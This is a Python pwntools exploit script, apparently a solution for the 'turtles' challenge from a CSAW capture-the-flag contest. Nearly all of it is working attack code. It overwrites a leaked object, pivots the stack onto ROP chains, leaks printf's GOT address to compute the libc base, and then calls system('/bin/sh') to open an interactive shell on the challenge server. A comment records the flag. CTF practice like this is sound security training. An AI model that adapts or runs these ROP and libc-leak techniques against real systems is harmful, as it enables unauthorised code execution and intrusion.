#!/usr/bin/env python
from pwn import *
# ROP gadgets as fixed virtual addresses inside ./turtles.  They are used
# below without any load base, so the binary is presumably non-PIE; the
# values are only valid for this exact challenge build and must be re-dumped
# (ROPgadget/ropper) if the binary changes.  pop_rdi / pop2_rsi are not
# referenced directly by exploit() -- pwntools' ROP() locates its own
# gadgets for the read()/printf()/system() calls it builds.
pop4_ret = 0x400d3c # : pop r12; pop r13; pop r14; pop r15; ret;  -- landing pad placed in the fake object; discards four qwords then returns
pop_rbp = 0x400ac0 # : pop rbp; ret;  -- together with leave_ret this pivots rsp onto attacker-controlled memory
leave_ret = 0x400b82 #: leave; ret;
pop_rdi = 0x400d43 #: pop rdi; ret;
pop2_rsi = 0x400d41 #: pop rsi; pop r15; ret;
mov_eax_0 = 0x0000000000400cbc # : mov eax, 0; add rsp, 0x838; pop rbx; pop rbp; ret;  -- epilogue that hops rsp over an 0x838-byte frame (+2 pops)
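def _read_turtle(label):
    """Consume the next ``Here is a Turtle: 0x...`` line from ``p`` and return the address.

    ``label`` only names the value in the log line ("turtle", "turtle2").
    ``int()`` tolerates surrounding whitespace, so a trailing ``\\r`` from a
    remote connection does not break parsing.
    """
    p.recvuntil(b"Here is a Turtle: 0x")
    value = int(p.recvline(keepends=False), 16)
    log.info("{}: 0x{:x}".format(label, value))
    return value


def _turtle_payload(turtle, chain):
    """Build the overwrite of the leaked "Turtle" that redirects control into ``chain``.

    Layout (``base = turtle + 0x20``; the slot contents are what the working
    exploit writes, their exact meaning to the program was recovered from the
    binary and is not re-derived here):

      turtle+0x00  base                 -- presumably an object/vtable pointer; verify against the binary
      turtle+0x08  chain                -- ROP chain executed once rsp is pivoted onto ``turtle``
      base+0x40    base + 0x58
      base+0x60    base + 0x90          -- slot that ends up pointing at pop4_ret
      base+0x80    10, 11, pop4_ret     -- pop4_ret discards four qwords and returns

    Note that ``ljust`` never truncates: if ``chain`` grows past the next
    padding boundary every later slot shifts and the overwrite silently
    breaks, so keep chains short.  All offsets are specific to this build.
    """
    offset = 0x20
    base = turtle + offset
    payload = b""
    payload += p64(base)
    payload += chain
    payload = payload.ljust(64 + offset, b"\x00")
    payload += p64(base + 0x80 - 0x28)
    payload = payload.ljust(0x60 + offset, b"B")
    payload += p64(base + 0x90)
    payload = payload.ljust(0x80 + offset, b"C")
    payload += p64(10)
    payload += p64(11)
    payload += p64(pop4_ret)
    return payload


def exploit():
    """Run the two-round attack against the ``turtles`` process in global ``p``.

    Round 1: the program leaks an address ("turtle").  The first payload
    overwrites the object at that address (see ``_turtle_payload``) so control
    reaches a chain that ``read()``s a second chain straight into ``turtle``
    and then pivots the stack onto it (``pop rbp; turtle-8; leave; ret`` —
    leave sets rsp=turtle-8, its pop advances rsp to turtle, ret executes what
    read() just stored there).  That second chain leaks printf's GOT entry by
    passing it to printf as the format string, which yields libc's base, and
    returns to main.
    Round 2: the program prints a fresh turtle; the same overwrite now carries
    a ``system("/bin/sh")`` chain built on the resolved libc.

    Depends on module globals ``p``, ``name``, ``binary`` and ``libc`` set in
    ``__main__``.  Gadget addresses and the libc symbol offsets must match the
    target exactly; locally that is ensured by loading libs/libc.so.6.
    Everything is handled as bytes so the script works under Python 2 and 3
    (``str(rop)`` is a repr, not the chain, on Python 3 pwntools).
    """
    turtle = _read_turtle("turtle")

    # Round 1, stage A: call read(0, turtle) through the binary, then pivot.
    rop = ROP(name)
    rop.read(0, turtle)
    rop.raw(pop_rbp)
    rop.raw(turtle - 8)
    rop.raw(leave_ret)
    p.sendline(_turtle_payload(turtle, rop.chain()))
    pause(2)  # let the process reach read() before the second chain arrives

    # Round 1, stage B: chain read into ``turtle``.  mov_eax_0 first lifts
    # rsp by 0x838 + 16 bytes over the "A" filler -- presumably so the frames
    # pushed by printf()/main() land in that filler instead of below the
    # pivot point (TODO confirm against the binary's stack layout).
    rop2 = ROP(name)
    rop2.raw(mov_eax_0)
    rop2.raw(b"A" * (0x838 + 16))
    rop2.printf(binary.got["printf"], 0)  # format string = resolved printf pointer bytes
    rop2.main()
    p.sendline(rop2.chain())

    # A userland x86-64 pointer is 6 significant bytes followed by NULs, which
    # is where printf's %s stops.  recvn() blocks for exactly 6 bytes; recv(6)
    # may return fewer on a fragmented read and would corrupt the leak.
    printf = u64(p.recvn(6).ljust(8, b"\x00"))
    log.info("printf: 0x{:x}".format(printf))
    libc.address = printf - libc.symbols["printf"]
    log.info("libc: 0x{:x}".format(libc.address ))
    if libc.address & 0xfff:
        # A mapped library base is page-aligned; anything else means the leak
        # was misparsed or libs/libc.so.6 is not the libc the target runs.
        log.warning("libc base is not page aligned -- leak or libc mismatch?")

    # Round 2: same overwrite, now carrying system("/bin/sh") from libc.
    turtle2 = _read_turtle("turtle2")
    rop3 = ROP(libc)
    rop3.system(next(libc.search(b"/bin/sh\x00")))
    p.sendline(_turtle_payload(turtle2, rop3.chain()))
    p.interactive()
    # flag{i_like_turtl3$_do_u?}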
if __name__ == "__main__":
    # Challenge binary plus the libc it ships with.  exploit() turns a leaked
    # printf address into a libc base via this file's symbol offsets, so the
    # local process is pointed at the very same library below.
    name = "./turtles"
    libc_name = "libs/libc.so.6"
    binary = ELF(name)
    libc = ELF(libc_name)

    context.terminal = ["tmux", "sp", "-h"]
    context.arch = "amd64"
    context.os = "linux"

    # Any command-line argument at all selects the CTF server; otherwise run
    # the binary locally with LD_LIBRARY_PATH forcing the bundled libc.
    want_remote = len(sys.argv) > 1
    p = (
        remote("pwn.chal.csaw.io", 9003)
        if want_remote
        else process(name, env={'LD_LIBRARY_PATH': './libs/'})
    )
    exploit()